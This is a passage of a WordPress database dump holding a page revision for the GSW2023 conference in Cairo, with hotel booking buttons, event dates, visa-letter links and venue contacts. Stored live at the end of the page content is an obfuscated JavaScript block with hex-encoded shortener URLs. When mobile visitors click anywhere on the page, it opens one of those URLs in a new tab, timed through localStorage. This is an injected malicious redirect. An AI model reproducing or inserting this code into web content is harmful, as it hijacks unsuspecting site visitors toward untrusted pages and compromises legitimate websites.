link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-11 13:15:40','2023-07-11 13:15:40','',3066,'https://gsw2023.com/?p=5007',0,'revision','',0),
(5008,1,'2023-07-11 13:16:35','2023-07-11 13:16:35','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: 